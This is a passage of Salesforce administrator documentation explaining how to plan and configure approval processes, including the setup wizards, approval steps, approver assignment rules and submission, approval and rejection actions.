If your organization has Approvals in Chatter enabled, you can specify an approval post template to use when notifying
users via Chatter that an approval request is assigned to them. You can use the default post template Salesforce offers if
it is appropriate for your approval process, or you can create your own post template.

Who should be the sender of approval requests?

Approval request notifications are automatically sent from the user who submitted the record for approval. When you
configure an email alert, you can set it to use a different return email address for these notifications. You can choose the
email address of the default workflow user if you've created one, or a previously configured and verified organization-wide
address. Determine what email address to use.

Who can approve requests?

Requests can be approved or rejected by any of the following:
• A user or queue that the approval request submitter chooses.

• A queue specified by the administrator.

• A user listed in the Manager standard field on the submitter's user detail page.

• A user listed in a custom hierarchy field on the submitter's user detail page.

• Any combination of users and related users (users listed in a standard or custom field on the submitted record)
specified by the administrator.

Each step in your approval process can assign approval requests using any of these options.

Should approval requests be delegated to another user for approval?

An approval request can be approved by an approver's designated delegate. However, you can disable this option. Decide
if you want to allow delegated users to approve requests. Then, for each user, populate the Delegated Approver field
on the user's detail page.

What records should be included in this process?

Determine what attributes a record must have to be included in your approval process. If necessary, create the custom
fields to store this information so that you can use it in your filter criteria. For example, if you want to include expense
records from your headquarters office only, create a custom picklist field called Office Location that has two options:
“HQ” and “Field.” Then, you would specify in your filter criteria that records must have “HQ” in the Office Location
field to be included in the approval process.

What should happen when a record is first submitted for approval?

When users submit a record for approval, Salesforce automatically locks the record so that other users cannot change it
while it is awaiting approval. You can still add campaign members to campaigns locked for approval.

Decide if you want other workflow actions to happen when a record is first submitted, such as email alerts, tasks, field
updates, and outbound messages. These actions become your Initial Submission Actions.

Should users be able to approve requests from a mobile device?

Determine if you want to require users to log in to Salesforce to approve requests. You can also set up your approval
process to allow users to approve requests remotely using a mobile browser.

Who can edit records that are awaiting approval?

Records submitted for approval are automatically locked. Users with the “Modify All” object-level permission for the
given object, or the “Modify All Data” permission, can always unlock a record and edit it. However, you may also specify
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that the currently assigned approver can edit the record as well. You can still add campaign members to campaigns locked
for approval.

Should records be automatically approved, rejected, or skipped based on certain criteria?

You can set entry criteria for each step of your process, and configure Salesforce to automatically approve, reject, or skip
the process if a record does not meet that entry criteria. For example, all expenses submitted with an Amount less than
$15 are automatically approved.

How many people need to approve these requests?

An approval process can have several layers of approvals. Determine how many users need to approve requests and in
what order.

Should any actions happen when a request is approved or rejected?

You can set up to 40 additional actions to take place when a request is recalled, approved, or rejected at each step, up to
10 of each of the following types:

DescriptionType

Assigns a task to a user you specify. You can specify the Subject, Status, Priority,
and Due Date of the task.

Task

Uses an email template you specify to send an email to a designated recipient.Email Alert

Changes the value of a selected field. You can specify a value or create a formula for the
new value.

Field Update

Sends a message to an endpoint you designate. You can also specify a username and the
data you want to include in the message.

Outbound Message

You can also set up to 40 additional actions to take place when a record has received all necessary approvals or is completely
rejected.

See Also:
Getting Started with Approval Processes
Approval Processes Overview
Examples of Approval Processes
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Choosing an Approval Process Wizard

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create approval processes:

Approval processes require planning and preparation. Before you create an approval process, determine which wizard is best
for your needs.

Jump Start Wizard

The jump start wizard is useful for simple approval processes with a single step. Use the jump start wizard if you want
to create an approval process quickly by allowing Salesforce to automatically choose some default options for you. For a
list of the options the jump start wizard chooses automatically, see Approval Process Jump Start Default Selections on
page 3168.

To create an approval process using the jump start wizard, see Using the Approval Process Jump Start Wizard on page
3164.

Standard Wizard

The standard wizard is useful for complex approval processes. Use it when you want to fine tune the steps in your approval
process. The standard wizard consists of a setup wizard that allows you to define your process and another setup wizard
that allows you to define each step in the process.

To create an approval process using the standard wizard, see Creating Approval Processes on page 3169.

See Also:
Approval Processes Overview
Getting Started with Approval Processes

Using the Approval Process Jump Start Wizard

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create approval processes:

The Approval Process Jump Start Wizard helps you create a simple one-step approval process in just a few clicks. However,
to make your process as functional and complete as possible, there are a few things you should do first:
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1. If you would like to automate approval routing, you can use the standard manager field, or create a custom hierarchy field
on the user object.

2. Create an email template to notify an approver that they need to approve or reject a step in an approval process. Remember
to add approval merge fields so an approver can go to the approval page directly from the email. If your organization has
enabled email approval response, be sure the email template you use describes how to correctly use both response options:
clicking the link and replying by email.

3. Create an email template as confirmation to a record owner that a step of theirs in the approval process has been approved
or rejected.

4. Create the actions—email alerts, field updates, outbound messages, and tasks—that you want to occur while a record is in
the process of being approved.

Design your approval process quickly using the jump start wizard. It automates the process of creating an approval process by
choosing some default options for you.

To use the jump start wizard to create an approval process:

1. From Setup, click Create > Workflow & Approvals > Approval Processes.
2. Choose the object for the new approval process.
3. Click Create New Approval Process and choose Use Jump Start Wizard from the drop-down button.
4. Enter a name for the new approval process.
5. Enter a unique name to refer to this component in the API. The requirement for uniqueness is only within the selected

object type. You can have actions of the same type with the same unique name, provided they are defined for different
objects. The Unique Name field can contain only underscores and alphanumeric characters. It must be unique within the
selected object type, begin with a letter, not include spaces, not end with an underscore, and not contain two consecutive
underscores.

6. Choose a custom email template to use when notifying approvers that an approval request is assigned to them, or leave
this field blank to use the default email template. Each approval process uses a single email template for all steps.

Note: If email approval response is enabled, be sure the email template you use describes how to correctly use
both response options: clicking the link and replying by email. If the user doesn't respond correctly (for example,
if the user misspells approve or types it on the wrong line), Salesforce doesn't register the user's response.

If the email template you choose contains approval merge fields named {!ApprovalRequest.field_name},
these fields will return values only when that email template is used as the approval assignment template. If you
use the template for any other email alert action—in either workflow rules or approval processes—the merge fields
will return a null value.

7. Select Add Approval History Related List... to update all the page layouts for this object to include a related
list that allows users to submit approval requests and track them.

8. If only certain types of records should enter this approval process, do one of the following:

• Select criteria are met if you want to set a filter criteria that a record must meet to enter this approval process.
For example, if only employees from headquarters should use this approval process to submit expense reports, enter
the following filter criteria: “Current User: Office Location Equals Headquarters.”

a. Enter filter criteria for records that you want included in this approval process. Leave the filter blank if you want
all records submitted to be included in the approval process.

Note:  Select a current user field if you want to filter based on the user submitting an approval request.
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b. Click Next. If you are editing an existing approval process and don't want to make further changes, click Save to
store your changes.

• Select formula evaluates to true if you want a formula to determine what records enter the approval process.

a. Enter a formula that returns “True” or “False.” A record enters the approval process if the formula returns “True.”
For example, use the following formula to require a record to enter this approval process when the record's discount
approval cutoff date is less than 30 days away:

(Discount_Approval_CutoffDate__c < (CloseDate - 30)

b. Click Next. If you are editing an existing approval process and don't want to make further changes, click Save to
store your changes.

Some functions are not available in approval process formulas. For information on which functions you can use in
approval process formulas, see Formula Operators and Functions on page 3037.

9. Select the assigned approver(s) for approval requests created by this step. The assigned approvers are the users or members
of a queue responsible for approving records that enter this step. The options are:

Let the submitter choose the approver manually.

Prompts the user to manually select the next approver.

Automatically assign an approver using a standard or custom hierarchy field.

Assigns the approval request to the user in the field displayed in this option. For example, you may want approval
requests automatically routed to a user's manager as specified in the Manager standard user hierarchy field.
Alternatively, you may want approval requests automatically routed to an associate specified in a custom Account
Manager user field.

To create a new custom field, click Create New Field from this option.

Automatically assign to a queue.

Assigns the approval request to a particular queue. Queues are only available on specific objects.

Automatically assign to approver(s).

Assigns the approval request to one or more of the following:

User

Any Salesforce user in your organization.

Related User

A user specified in any user lookup field on the submitted record, such as the Last Modified By field.

Use Add Row and Remove Row to change the number of approvers. There is a limit of 25 approvers per step.

Note:  When specifying approvers, note the following:

• Make sure the assigned approver has access to read the records for the approval requests. For example, a user
who does not have read access to an Expenses custom object will not be able to view expense approval requests.

• You can't assign approval requests to partner users.
• You can't use email approval response with approval processes in which the assigned approver is a queue.
• Approvers must have the “API Enabled” system permission to approve or reject approval requests via email.
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• You can assign an approval request to the same user multiple times in a single step; however, Salesforce
recognizes such redundancies and only requests a single approval from the user.

• After a record enters an approval step, the designated approvers for that step don't change even if the approval
process returns to that step and the values of related user fields that designate the approvers have changed. For
example, consider an approval process in which the first step requests approval from a user's manager. If the
approval request is rejected in the second step and sent back to the first step, the user's original manager receives
the approval request again even if the user's manager has changed.

• When the assigned approver is a queue:

◊ Any queue member can approve or reject an approval request that is assigned to the queue.
◊ When an approval request is assigned to a queue, the email notification is sent to the email address for the

queue. Depending on your queue settings, an email notification is also sent to each queue member.
◊ When an approval request is assigned to a queue, each queue member's delegated approver also receives

an approval request email notification.
◊ Because email notifications to a queue aren’t intended for an external audience, any instances of the merge

field {!ApprovalRequest.External_URL} in the email template are sent as the equivalent internal
URL.

◊ When an approval request is rejected and returned to the previous approver and the previous approver was
a queue, the approval request is assigned to the user who approved it, instead of the queue.

◊ The Approval History related list displays the queue name in the Assigned To column and the actual
user who approved or rejected the approval request in the Actual Approver column.

10. If you specify multiple approvers in the Automatically assign to approver(s) option, choose one of the following:

Approve or reject based on the first response.

The first response to the approval request determines whether the record is approved or rejected.

Require unanimous approval from all selected approvers.

The record is only approved if all of the approvers approve the request. The approval request is rejected if any of the
approvers reject the request.

11. Click Save to return to the Approval Process Detail page.
12. Select approval actions. For more information, see Selecting Approval Actions on page 3186.
13. When you are ready to use the approval process, activate it:

a. From Setup, click Create > Workflow & Approvals > Approval Processes.
b. Click Activate next to an inactive process to activate it.

See Also:
Choosing an Approval Process Wizard
Creating Approval Processes
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Approval Process Jump Start Default Selections

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create approval processes:

The jump start wizard automates creating an approval process by automatically choosing some default options for you. When
you use the jump start wizard, your approval process will have the following attributes:

• Users must have the “Modify All” object-level permission for the given object, or the “Modify All Data” permission, to
edit records that are awaiting approval in the approval process.

• The approval request page layout displays the record name (or number), owner, date created, and approval history.

• The security settings prevent an approver from accessing the approval page externally from a wireless-enabled mobile
device.

• The owner of a record is the only person who can submit an approval request.

• Records are locked when submitted for approval.

• Records remain locked until approved or rejected.

• Rejected records are unlocked.

• Only administrators can recall a record after it is submitted for approval.

• There are no auto-approve or auto-reject actions.

• No email notification is sent upon approval or rejection.

• No field values are automatically updated during the approval process.

• An approver cannot automatically delegate another user to approve his or her approval requests.

• The Allow submitters to recall approval requests option is not selected.

After creating an approval process using the jump start wizard, you can change any of the above attributes by clicking Edit
from any approval process list page, and you can add additional steps from the approval process detail page. However, you
cannot edit the Record Lock action on the Initial Submission Actions list.

Use the Process Visualizer to display a graphical version of an approval process. The view-only diagram is presented as a
flowchart. The diagram and informational sidebar can help you visualize and understand the defined steps, criteria, and actions
that comprise your approval process.

See Also:
Using the Approval Process Jump Start Wizard
Choosing an Approval Process Wizard
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Creating Approval Processes
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create approval processes:

An approval process is an automated process your organization can use to approve records in Salesforce. An approval process
specifies the steps necessary for a record to be approved and who must approve it at each step. A step can apply to all records
included in the process, or just records that meet certain administrator-defined criteria. An approval process also specifies the
actions to take when a record is approved, rejected, recalled, or first submitted for approval.

Before you begin, determine which wizard to use. See Choosing an Approval Process Wizard on page 3164. To create an approval
process:

1. Launch the Approval Process Wizard.
2. Specify Name, Unique Name, and Description.
3. Specify Criteria for Entering Process.
4. Specify Approver Field and Record Editability.
5. Select Email or Chatter Post Notification Template.
6. Configure Approval Request Page Layout.
7. Specify Initial Submitters.
8. Activate the Approval Process.

Launch the Approval Process Wizard

1. From Setup, click Create > Workflow & Approvals > Approval Processes.
2. Choose the object for the new approval process.
3. Click Create New Approval Process and choose Use Standard Setup Wizard from the drop-down button. Alternatively,

click Use Jump Start Wizard if you want to create a basic approval process with default settings. For instructions on using
the jump start wizard, see Using the Approval Process Jump Start Wizard on page 3164.

Specify Name, Unique Name, and Description

1. Enter a name for the new approval process.
2. Enter a unique name, which will be used to refer to this approval process in the Force.com API. The requirement for

uniqueness is only within the selected object type. You can have two approval processes with the same unique name,
provided they are defined for different objects, such as one for Campaigns and one for Opportunities. The Unique Name
field can contain only underscores and alphanumeric characters. It must be unique within the selected object type, begin
with a letter, not include spaces, not end with an underscore, and not contain two consecutive underscores.

3. Optionally, enter a description.
4. Click Next. If you are editing an existing approval process and don't want to make further changes, click Save to store

your changes.

Specify Criteria for Entering Process

If only certain types of records should enter this approval process, do one of the following:

3169

Creating Approval ProcessesUsing Approval Processes



• Select criteria are met if you want to set a filter criteria that a record must meet to enter this approval process. For
example, if only employees from headquarters should use this approval process to submit expense reports, enter the following
filter criteria: “Current User: Office Location Equals Headquarters.”

1. Enter filter criteria for records that you want included in this approval process. Leave the filter blank if you want all
records submitted to be included in the approval process.

Note:  Select a current user field if you want to filter based on the user submitting an approval request.

2. Click Next. If you are editing an existing approval process and don't want to make further changes, click Save to store
your changes.

• Select formula evaluates to true if you want a formula to determine what records enter the approval process.

1. Enter a formula that returns “True” or “False.” A record enters the approval process if the formula returns “True.” For
example, use the following formula to require a record to enter this approval process when the record's discount approval
cutoff date is less than 30 days away:

(Discount_Approval_CutoffDate__c < (CloseDate - 30)

2. Click Next. If you are editing an existing approval process and don't want to make further changes, click Save to store
your changes.

Some functions are not available in approval process formulas. For information on which functions you can use in approval
process formulas, see Formula Operators and Functions on page 3037.

Specify Approver Field and Record Editability

When you define approval steps, you can assign approval requests to different users. One option is to use a user field to
automatically route these requests. The user field can be any custom hierarchical relationship field such as Account Manager
or the Manager standard user field. To see some examples of specifying a user field as an approver field, see Examples of
Approval Processes on page 3209.

When a record is in the approval process, it is always locked; only an administrator can edit it. However, you can also allow
the currently-assigned approver to edit the record. You can still add campaign members to campaigns locked for approval.

1. From the Next Automated Approver Determined By picklist, select a user field if you want Salesforce to automatically
assign approval requests to an approver based on the value in the user field. For example, you may want approval requests
automatically routed to a user's manager as specified in the Manager standard user hierarchy field. Or, you may want
approval requests automatically routed to an associate specified in a custom Account Manager user field.

• To specify a user to approve all approval requests, leave this field blank. You can select a user, or users, as the approver
when creating an approval step.

Warning:  If you leave the Next Automated Approver Determined By field blank, you can't
automatically assign approval requests to the manager in any step you create for this approval process.

• Optionally, select the Use Approver Field of Record Owner checkbox if you want the approval process to use
the Manager standard user field or a custom field on the record owner's user record instead of the submitter's user
record. Once you use this setting in a step, and in subsequent steps, it refers to the manager of the approver, not the
manager of the record owner.
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Note: Make sure the assigned approver has access to read the records for the approval requests. For example, a
user who does not have read access to an Expenses custom object will not be able to view expense approval requests.

2. Select Administrators ONLY... if you want only users with the “Modify All” object-level permission for the given
object, or the “Modify All Data” permission, to be able to edit records that are pending approval. Select Administrators
OR... if you want the assigned approver to be able to edit the records too. The assigned approver must also have edit
access to the record through both their permissions and the organization-wide sharing defaults for the given object. When
a record is submitted for approval, it is automatically locked to prevent other users from editing it during the approval
process.

3. Click Next. If you are editing an existing approval process and don't want to make further changes, click Save to store
your changes.

Select Email or Chatter Post Notification Template

When an approval process assigns an approval request to a user, Salesforce automatically sends the user an approval request
email. The email contains a link to the approval page in Salesforce, where the user can approve or reject the request and add
comments. If email approval response is enabled, the user can alternatively reply to the email by typing approve, approved,
yes, reject, rejected, or no in the first line of the email body, and adding comments in the second line. This option is
especially useful for users who might receive approval requests on a mobile device.

Note: Approvers must have the “API Enabled” system permission to approve or reject approval requests via email.

If your organization has Approvals in Chatter enabled, you can also elect to send your approver a notification via Chatter.

Note: Chatter post approval notifications are only available for approval processes associated with an object that has
been enabled for feed tracking.

If the assigned approver has opted to receive approval requests as Chatter posts, they'll see a post on their Chatter feed in
addition to getting the approval request email.

1. Choose a custom email template to use when notifying approvers that an approval request is assigned to them, or leave
this field blank to use the default email template. Each approval process uses a single email template for all steps.

Note: If email approval response is enabled, be sure the email template you use describes how to correctly use
both response options: clicking the link and replying by email. If the user doesn't respond correctly (for example,
if the user misspells approve or types it on the wrong line), Salesforce doesn't register the user's response.

If the email template you choose contains approval merge fields named {!ApprovalRequest.field_name},
these fields will return values only when that email template is used as the approval assignment template. If you
use the template for any other email alert action—in either workflow rules or approval processes—the merge fields
will return a null value.

2. If available, choose an approval post template to use when notifying approvers via a post in their Chatter feed. If you don't
pick an approval post template, the approval post for the object uses either the system default template or, if you created
one, the default template for the object.

Note:  Only users with access to the approval record can see the approval request post. Comments on approval
posts aren't persisted to the approval record.

3. Click Next. If you are editing an existing approval process and don't want to make further changes, click Save to store
your changes.
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Configure Approval Request Page Layout

The approval page is where an approver approves or rejects a request.

1. Select the fields you want to display on the approval request page and click Add.
2. Sort the fields by selecting them and clicking Up or Down.
3. Select Display approval history information... to include the Approval History related list that lists such

fields as Date, Assigned To, Actual Approver, and Comments.
4. Select Add Approval History Related List... to update all the page layouts for this object to include a related

list that allows users to submit approval requests and track them.
5. Choose a security setting:

Allow approvers to access the approval page only from within the application

Requires users to log in to Salesforce before approving or rejecting an approval request.

Allow approvers to access the approval page only from within the application, or
externally from a wireless-enabled mobile device

Users can approve requests from the email notification they receive via a wireless device. Note that this prevents the
approver from selecting a Salesforce user as the next approver.

6. Click Next. If you are editing an existing approval process and don't want to make further changes, click Save to store
your changes.

Specify Initial Submitters

Specify which users are allowed to submit records for approval. For example, choose Owner if expense reports can only be
submitted by record owners.

1. Select a Submitter Type, enter a search term, and click Find.
2. Select from the list of available submitters and click Add.
3. Optionally, select Allow submitters to recall approval requests to give submitters the option to withdraw their approval

requests. If the Allow submitters to recall approval requests option is selected for the approval process, both submitters
and administrators can see the Recall Approval Request button in the Approval History related list on the detail page of
submitted records; otherwise, only administrators can see it. When a user clicks Recall Approval Request, the pending
approval request for the record is withdrawn and recall actions are run. For more information, see Recall Actions on page
3183.

This option is useful for situations that can change on the submitter's side while waiting for an approval. For example, an
opportunity might be lost after the user submits it for approval.

4. Click Save.

Activate the Approval Process

Activate the process after you have created at least one approval step for the approval process. See Creating Approval Steps
on page 3173.

To activate a process:

1. Click Next. If you are editing an existing approval process and don't want to make further changes, click Save to store
your changes.
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2. Click Activate next to the process.

See Also:
Getting Started with Approval Processes
Managing Approval Processes
Approval Process Considerations

Creating Approval Steps

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create approval steps:

Approval steps assign approval requests to various users and define the chain of approval for a particular approval process.
Each approval step specifies the attributes a record must have to advance to that approval step, the user who can approve
requests for those records, and whether to allow the delegate of the approver to approve the requests. The first approval step
in a process also specifies the action to take if a record does not advance to that step. Subsequent steps in the process also allow
you to specify what happens if an approver rejects the request.

The actions you associate with an approval step can be reused in workflow rules. To create approval steps:

1. From Setup, click Create > Workflow & Approvals > Approval Processes, and select the name of the approval process.
2. Click New Approval Step from the Approval Steps related list. If this button is not available, the approval process is active

and you cannot add more steps. There is a limit of 15 steps per process.
3. Enter a name, a unique name, and description for this step.

Note: The Unique Name field can contain only underscores and alphanumeric characters. It must be unique
within the selected object type, begin with a letter, not include spaces, not end with an underscore, and not contain
two consecutive underscores. The unique name will be used to refer to this specific approval process step in the
Force.com API. The requirement for uniqueness is only within a specific approval process. You can have two
approval process steps with the same unique name, provided they are defined for different approval processes.

4. Enter a step number that determines the order of this step in relation to the other steps in this approval process.
5. Click Next.
6. If only records with certain attributes should enter this step, select Enter this step if the following... and

choose one of the following options:

• Select criteria are met and set the filter criteria a record must meet to enter this step. For example, if this step
should only apply to records submitted by employees from headquarters, enter the following filter criteria: Current
User: Office Location Equals Headquarters.
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• Select formula evaluates to true and enter a formula that returns a value of “True” or “False.” Records enter
this step only if the formula returns “True.” For example, use the following formula to require a record to enter this
approval step when the record's discount percentage is greater than the most recent approver's discount threshold:

(Discount_Percentage__c > $User.Discount_Threshold__c)

For information on which functions you can use in approval formulas, see Formula Operators and Functions on page
3037.

7. If you specified filter criteria or entered a formula, choose what should happen to records that do not meet the criteria or
if the formula does not return “True.”

Note:  You can’t change your selection after the approval process has been activated, even if you deactivate the
approval process.

The options are:

approve record

Automatically approves the request and performs all final approval actions.

reject record

Automatically rejects the request and performs all final rejection actions. This option is only available for the first
step in the approval process.

go to next step

Automatically skips this step and goes to the next step.

Important:

• The go to next step option is only available when editing a step that already has an ensuing step. To
select go to next step, create an ensuing step, then select this option in the preceding step.

• The go to next step option is unavailable for the final step in the approval process.
• If you select go to next step in a step and delete all the ensuing steps, Salesforce automatically removes

the go to next step definition from that step and ends the process if the step criteria are not met. However,
if you select go to next step in your first step and delete all the ensuing steps, Salesforce changes the first
step to automatically reject record if the step criteria are not met.

• If you select go to next step in the first step and the record does not meet the criteria for any of the steps
in the approval process, the record is rejected.

8. Click Next.
9. Specify who must approve the approval requests that enter this step. The options are:

Let the submitter choose the approver manually.

Prompts the user to manually select the next approver.

Automatically assign using the user field selected earlier.

Assigns the approval request to the user in the custom field that is displayed next to this option. This custom field
was selected during the configuration of the approval process.
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Automatically assign to a queue.

Assigns the approval request to a particular queue. Queues are only available on specific objects.

Automatically assign to approver(s).

Assigns the approval request to one or more of the following:

User

Any Salesforce user in your organization.

Related User

A user specified in any user lookup field on the submitted record, such as the Last Modified By field.

Use Add Row and Remove Row to change the number of approvers. There is a limit of 25 approvers per step.

Note:  When specifying approvers, note the following:

• Make sure the assigned approver has access to read the records for the approval requests. For example, a user
who does not have read access to an Expenses custom object will not be able to view expense approval requests.

• You can't assign approval requests to partner users.
• You can't use email approval response with approval processes in which the assigned approver is a queue.
• Approvers must have the “API Enabled” system permission to approve or reject approval requests via email.
• You can assign an approval request to the same user multiple times in a single step; however, Salesforce

recognizes such redundancies and only requests a single approval from the user.
• After a record enters an approval step, the designated approvers for that step don't change even if the approval

process returns to that step and the values of related user fields that designate the approvers have changed. For
example, consider an approval process in which the first step requests approval from a user's manager. If the
approval request is rejected in the second step and sent back to the first step, the user's original manager receives
the approval request again even if the user's manager has changed.

• When the assigned approver is a queue:

◊ Any queue member can approve or reject an approval request that is assigned to the queue.
◊ When an approval request is assigned to a queue, the email notification is sent to the email address for the

queue. Depending on your queue settings, an email notification is also sent to each queue member.
◊ When an approval request is assigned to a queue, each queue member's delegated approver also receives

an approval request email notification.
◊ Because email notifications to a queue aren’t intended for an external audience, any instances of the merge

field {!ApprovalRequest.External_URL} in the email template are sent as the equivalent internal
URL.

◊ When an approval request is rejected and returned to the previous approver and the previous approver was
a queue, the approval request is assigned to the user who approved it, instead of the queue.

◊ The Approval History related list displays the queue name in the Assigned To column and the actual
user who approved or rejected the approval request in the Actual Approver column.

10. If you specify multiple approvers in the Automatically assign to approver(s) option, choose one of the following:

Approve or reject based on the first response.

The first response to the approval request determines whether the record is approved or rejected.
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Require unanimous approval from all selected approvers.

The record is only approved if all of the approvers approve the request. The approval request is rejected if any of the
approvers reject the request.

11. Optionally, select The approver's delegate may also approve this request. A delegate is the user listed
in the Delegated Approver field on the assigned approver's user detail page. Delegated approvers can't reassign approval
requests; they can only approve or reject approval requests.

12. If this is not the first step in the approval process, specify what will happen if the approver rejects a request in this step:

Perform all rejection actions...

Automatically rejects the request completely regardless of any previous steps that were approved. Salesforce performs
all rejection actions specified for this step and all final rejection actions.

Perform ONLY the rejection actions for this step...

Automatically rejects the request and returns the approval request to the previous approver. Salesforce performs all
rejection actions specified for this step.

Note:  If this is the first step in an approval process, the rejection behavior is determined by the final rejection
actions for the approval process.

13. Click Save.
14. Specify any workflow actions you want to occur during this step:

Yes, I'd like to create a new approval action...

Select the type of action and click Go! to begin creating an action and associate it with this approval step.

Yes, I'd like to create a new rejection action...

Select the type of action and click Go! to begin creating an action and associate it with this approval step.

No, I'll do this later...

Select this option and click Go! to view the details of the approval process.

Approval actions execute when a record in this step of the approval process is approved. Rejection actions execute when a
record in this step is rejected.

15. Optionally, add additional approval actions and rejection actions to the step. Click Show Actions next to a step to view
the Approval Actions and Rejection Actions related lists.

See Also:
Getting Started with Approval Processes
Managing Approval Steps
Process Visualizer Overview
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Managing Approval Steps

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To edit or delete approval steps:

“View Setup and Configuration”To view approval steps:

Approval steps assign approval requests to various users and define the chain of approval for a particular approval process.
Each approval step specifies the attributes a record must have to advance to that approval step, the user who can approve
requests for those records, and whether to allow the delegate of the approver to approve the requests. The first approval step
in a process also specifies the action to take if a record does not advance to that step. Subsequent steps in the process also allow
you to specify what happens if an approver rejects the request.

To manage the steps for an approval process, from Setup, click Create > Workflow & Approvals > Approval Processes and
then select the approval process.

The Approval Steps related list shows all the steps and actions for the approval process.

• If the actions for each step are not listed, click Show Actions to display the Approval Actions and Rejection Actions related
lists. Use these related lists to:

◊ Click Edit to change an action. Any changes you make to an action affect any other approval processes or workflow
rules that use it. This option is only available for some types of actions.

◊ Click Remove to remove the action from the approval process. This does not delete the action. This option is only
available for some types of actions.

◊ Click Add Existing to add another action to the list of actions. See Selecting Approval Actions on page 3186.

◊ Click Add New and select the appropriate type to create a new action and associate it with the approval process. See
Creating Approval Actions on page 3178.

• Click Hide Actions to collapse the list of approval steps.

• Click Edit to change the step. For information on approval step attributes, see Creating Approval Steps on page 3173.

• Click Del to remove a step. This option is not available when the approval process is active.

• Click New Approval Step to create an additional step. This option is not available when the approval process is active.
See Creating Approval Steps on page 3173.

See Also:
Process Visualizer Overview
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Creating Approval Actions

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create approval actions:

Create approval actions to associate with approval steps, initial submission, final approval, final rejection, or recall. For example,
you may have an expense approval process in Salesforce that you want to send an outbound message to your Oracle accounting
service to print expense checks when expense approval requests are approved.

To create an approval action:

1. From Setup, click Create > Workflow & Approvals > Approval Processes.
2. Select the approval process you want associated with the action.
3. Click Add New from the appropriate related list. When creating actions for an approval step, click Show Actions if they

are hidden.
4. Choose the type of action. The list of available actions differs depending on your settings and whether you have reached

the limit for any type of action:

• Configure the email alert.
• Configure the field update.
• Configure the outbound message.
• Configure the task.

Note:  The actions you create for approval processes can be reused in workflow rules.

See Also:
Getting Started with Approval Processes
Approval Process Terminology
Process Visualizer Overview
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Selecting Approval Actions

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To select approval actions:

There are four types of approval actions:

DescriptionType

Assigns a task to a user you specify. You can specify the Subject, Status, Priority, and
Due Date of the task.

Task

Uses an email template you specify to send an email to a designated recipient.Email Alert

Changes the value of a selected field. You can specify a value or create a formula for the new
value.

Field Update

Sends a message to an endpoint you designate. You can also specify a username and the data
you want to include in the message.

Outbound Message

You can associate approval actions with approval steps, initial submission, final approval, final rejection, and recall. You can
also reuse these actions for workflow rules. Before you begin, from Setup, click Create > Workflow & Approvals > Approval
Processes and select the approval process you want associated with the actions.

To select an approval action:

1. Click Add Existing from the appropriate related list on the detail page of any approval process. If the Add Existing button
does not appear on an approval step, click Show Actions.

Alternatively, click Add New to create a new action and apply it to the selected approval process. For instructions on
creating actions, see Creating Approval Actions on page 3178.

2. Choose the type of action.
3. Select the action in the list of available actions and click Add to add the action to the list of selected actions.
4. Click Save.

See Also:
Managing Approval Processes
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Initial Submission Actions

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or edit initial submission actions:

Initial submission actions are the actions that occur when a user first submits a record for approval. By default, an action to
lock the record runs automatically on initial submission. Initial submission actions can include any approval actions such as
email alerts, field updates, tasks, or outbound messages. For example, an initial submission action can update a custom approval
status field to “In Progress.”

When a user submits a record for approval, Salesforce sends an approval request email to the approver as defined in the approval
step, and then executes a default initial submission action called Record Lock. You can select up to 40 additional actions to
occur when a record is initially submitted for approval, 10 of each of the following types:

DescriptionType

Assigns a task to a user you specify. You can specify the Subject, Status, Priority, and
Due Date of the task.

Task

Uses an email template you specify to send an email to a designated recipient.Email Alert

Changes the value of a selected field. You can specify a value or create a formula for the new
value.

Field Update

Sends a message to an endpoint you designate. You can also specify a username and the data
you want to include in the message.

Outbound Message

To manage the initial submission actions for an approval process, from Setup, click Create > Workflow & Approvals >
Approval Processes and select the approval process.

The Initial Submission Actions related list shows all the actions that take place when a record is submitted for approval.

• Click Edit to change an action. Any changes you make to an action affect any other approval processes or workflow rules
that use it. This option is only available for some types of actions.

• Click Remove to remove the action from the approval process. This does not delete the action. This option is only available
for some types of actions.

• Click Add Existing to add another action to the list of actions. See Selecting Approval Actions on page 3186.

• Click Add New and select the appropriate type to create a new action and associate it with the approval process. Next,
configure the action:

◊ Configure the email alert.

◊ Configure the field update.

◊ Configure the outbound message.
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◊ Configure the task.

See Also:
Getting Started with Approval Processes
Process Visualizer Overview
Approval Process Terminology

Final Approval Actions

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or edit final approval actions:

Final approval actions are the actions that occur when all required approvals have been given for a record. Final approval actions
can include email alerts, field updates, tasks, or outbound messages. For example, a final approval action can change the status
to “Approved” and send an email notification.

When a record has been approved by all approvers, Salesforce executes all final approval actions. A default final approval action
called Record Lock is selected for you. You can modify it to automatically lock or unlock the record. You can select up to 40
additional actions to occur when a record is finally approved, 10 of each of the following types:

DescriptionType

Assigns a task to a user you specify. You can specify the Subject, Status, Priority, and
Due Date of the task.

Task

Uses an email template you specify to send an email to a designated recipient.Email Alert

Changes the value of a selected field. You can specify a value or create a formula for the new
value.

Field Update

Sends a message to an endpoint you designate. You can also specify a username and the data
you want to include in the message.

Outbound Message

To manage the final approval actions for an approval process, from Setup, click Create > Workflow & Approvals > Approval
Processes, and select the approval process.

The Final Approval Actions related list shows all the actions that take place when a record is finally approved.

• Click Edit to change an action. Any changes you make to an action affect any other approval processes or workflow rules
that use it. This option is only available for some types of actions.

• Click Remove to remove the action from the approval process. This does not delete the action. This option is only available
for some types of actions.
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• Click Add Existing to add another action to the list of actions. See Selecting Approval Actions on page 3186.

• Click Add New and select the appropriate type to create a new action and associate it with the approval process. Next,
configure the action:

◊ Configure the email alert.

◊ Configure the field update.

◊ Configure the outbound message.

◊ Configure the task.

See Also:
Getting Started with Approval Processes
Process Visualizer Overview
Approval Process Terminology

Final Rejection Actions

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or edit final rejection actions:

Final rejection actions are the actions that occur when an approver rejects the request and it goes to the final rejection state.
Final rejection actions can include email alerts, field updates, tasks, or outbound messages. For example, a final rejection action
